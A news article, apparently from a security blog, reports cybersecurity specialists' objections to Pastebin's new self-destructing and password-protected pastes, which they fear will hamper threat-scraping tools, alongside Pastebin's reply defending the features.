Cybersecurity specialists opposet new Pastebin functions
Last week, the world’s most popular paste site, Pastebin, ranked in the top 2000 most popular sites on the Internet by Alexa, added two new features that were criticized by the cybersecurity community. Specialists opposet new Pastebin functions.
We are talking about the Burn After Read (self-destruction) and Password Protected Pastes (password protection) functions, which have long existed on other paste-sites, but until recently missed on Pastebin.The problem is that Pastebin has long attracted criminals, even when it did not have new functions and contained a lot of illegal content. As stolen data is regularly uploaded to the site, hackers use it as a hosting for malware and codes, and as a repository of IP addresses for C&C servers, and so on.
The ZDNet magazine cites cybersecurity expert Ted Samuels, who said that abuse quite common on Pastebin.
“Pastebin is the most popular paste site today and a fairly popular platform for fileless attacks using PowerShell. For example, an attacker’s initial payload could use PowerShell to download additional (and often obfuscated) content from pastebin.com for execution via PowerShell. Thus, you can even load the CobaltStrike framework”, — says the specialist.
To counter this, many information security companies have long ago created tools that scrape new entries on Pastebin and search for malware and confidential data among them. Then, such malicious pastes are not only indexed and included in private threat databases, but also come into the field of view of the Pastebin administration, after which they are deleted.
Now many experts are seriously concerned that new Pastebin functions will interfere with the work of such tools, and it will become much more difficult to track new pastes in real time, and Pastebin will finally turn into a shelter for criminals.
ZDNet recalls that the relationship between Pastebin and information security experts has been tense for a long time.
For example, in the spring of this year, the Pastebin developers unexpectedly announced the end of support for the Scraping API, which specialists used to scrap data and detect threats according to the above scheme.
After an extremely negative reaction from the community, it was decided to abandon this idea, but now, when hackers have the opportunity to protect their pastes with passwords or destroy them, the Scraping API can still become practically useless for researchers, and the resource will turn into completely “opaque”.
At the same time, Pastebin representatives assured the journalists that they introduced new functions at the request of users.
“Pastebin stores important data for its users, from calculations and engineering data, such as algorithms, logs of various services, robots, network devices, and ending with proprietary software code. We have received many requests from users who asked to implement these features because of their privacy rights and to help them protect their work. Pastebin was created by developers for developers and is used by millions of people around the world. Of course, every platform has attackers trying to abuse its benefits, including GitHub, Twitter, Facebook, Dropbox, Privnotes and Sendspace”, — the company said.
The developers also believe that information security experts are overly dramatizing, because there are dozens of other paste-sites on the network, many of which are much more tolerate to abuse on their platforms. In addition, the company recalled that they are actively fighting malicious content, cooperating with CERT, information security companies and law enforcement agencies around the world, and also provide free access for researchers and scientists.
And here are some positive examples of addressing threats through Pastebin: one German information security researcher hacked Muhstik ransomware server and issued decryption keys after which he published the results for everyone on Pastebin, and another information security specialist researched Echobot IoT Malware and shared all payloads on Pastebin.
Information security experts, in turn, have long been saying that Pastebin and other similar sites should be blocked on corporate networks. After all, everyone knows that intruders abuse them, which means that such resources should be treated accordingly.